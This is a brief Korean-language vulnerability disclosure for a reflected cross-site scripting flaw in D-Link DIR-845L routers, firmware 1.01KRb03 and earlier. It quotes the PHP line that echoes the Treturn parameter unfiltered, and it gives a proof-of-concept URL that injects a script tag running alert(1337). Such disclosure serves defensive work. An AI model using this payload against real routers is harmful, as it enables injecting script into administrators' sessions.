
D-Link DIR-845L 라우터는 /htdocs/webinc/js/bsc_sms_inbox.php를 통해 Cross Site Scripting (XSS)에 취약합니다.
D-Link DIR-845L 라우터 버전 1.01KRb03 이하는 /htdocs/webinc/js/bsc_sms_inbox.php를 통한 크로스 사이트 스크립팅(XSS)에 취약합니다.
/htdocs/webinc/js/bsc_sms_inbox.php이 취약점은 $_GET["Treturn"] 매개변수에 대한 필터링 부재로 인해 발생하며, 해당 매개변수는 bsc_sms_inbox.php의 17번째 줄 코드에서 직접 사용됩니다.
취약한 코드 조각:
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
